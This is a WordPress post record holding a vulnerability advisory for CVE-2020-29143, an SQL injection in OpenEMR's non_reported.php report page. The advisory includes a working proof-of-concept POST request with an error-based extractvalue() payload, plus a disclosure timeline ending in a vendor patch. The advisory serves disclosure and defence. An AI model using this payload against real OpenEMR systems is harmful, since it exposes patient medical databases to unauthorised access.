{"id":94,"date":"2021-02-15T01:58:37","date_gmt":"2021-02-14T19:58:37","guid":{"rendered":"https:\/\/murat.one\/?p=94"},"modified":"2021-02-15T02:29:01","modified_gmt":"2021-02-14T20:29:01","slug":"cve-2020-29143-sql-injection-vulnerability-in-interface-reports-non_reported-php-in-openemr-6-0-0-dev-5-0-25","status":"publish","type":"post","link":"https:\/\/murat.one\/?p=94","title":{"rendered":"CVE-2020-29143. SQL injection vulnerability in OpenEMR 6.0.0-dev, 5.0.2(5)"},"content":{"rendered":"\n

Product:<\/strong> OpenEMR 6.0.0-dev, OpenEMR 5.0.2(5)<\/p>\n\n\n\n

Vulnerability:<\/strong> SQL injection<\/p>\n\n\n\n

Discovered:<\/strong> Kutlymurat Mambetniyazov (@manfromkz)<\/p>\n\n\n\n

Acknowledgements: <\/strong>NitroTeam.kz<\/p>\n\n\n\n

Date:<\/strong> 11\/24\/2020<\/p>\n\n\n\n

Description: <\/strong>Ineffective use of add_escape_custom() in interface\/reports\/non_reported.php leads to SQL injection.<\/p>\n\n\n\n

Requirements: <\/strong>the administrator account<\/p>\n\n\n\n

Tested on: <\/strong>Windows 10, Apache 2.4, 10.3.22-MariaDB. PHP 7.1.33 for OpenEMR 5.0.2(5) and PHP 7.4 for OpenEMR 6.0.0-dev<\/p>\n\n\n\n

Vulnerable code:<\/strong> interface\/reports\/non_reported.php:85<\/p>\n\n\n\n

$query_codes .= add_escape_custom($code) . \",\";<\/code><\/pre>\n\n\n\n
Steps to reproduce<\/strong>:<\/p>\n\n\n\n
Send the POST request (replace with your Host, valid csrf_token_form and OpenEMR cookie of administrator):<\/p>\n\n\n\n
POST \/interface\/reports\/non_reported.php HTTP\/1.1\nHost: openemr60.kz\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 203\nOrigin: https:\/\/openemr60.kz\nConnection: close\nCookie: OpenEMR=FolYY6Y6%2CNwDDANwci5GfRdQXosr2ZkZ76e7PNHPJGTTc-eD; \n\ncsrf_token_form=639ee383724ab4de7bd56e47a454ea96cadeb6de&form_refresh=true&form_get_hl7=false&form_from_date=2020-11-16&form_to_date=2020-11-23&form_code%5B%5D=extractvalue(0x0a,concat(0x0a,(version())))\n<\/code><\/pre>\n\n\n\n
Screenshot for 6.0.0-dev:<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Screenshot for 5.0.2(5):<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Timeline of the vulnerability:<\/p>\n\n\n\n
11\/24\/2020 \u2013 vulnerability discover
11\/24\/2020 \u2013 notification to vendor
11\/25\/2020 \u2013 confirmation by vendor
11\/27\/2020 \u2013 reservation of CVE ID at MITRE
01\/07\/2021 \u2013 patch release
02\/15\/2021 \u2013 published<\/p>\n","protected":false},"excerpt":{"rendered":"
Ineffective use of add_escape_custom() in interface\/reports\/non_reported.php leads to SQL injection  in OpenEMR 6.0.0-dev, 5.0.2(5).<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[10,14],"tags":[18,15,17,16],"_links":{"self":[{"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/posts\/94"}],"collection":[{"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/murat.one\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=94"}],"version-history":[{"count":4,"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/posts\/94\/revisions"}],"predecessor-version":[{"id":110,"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/posts\/94\/revisions\/110"}],"wp:attachment":[{"href":"https:\/\/murat.one\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=94"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/murat.one\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=94"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/murat.one\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=94"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}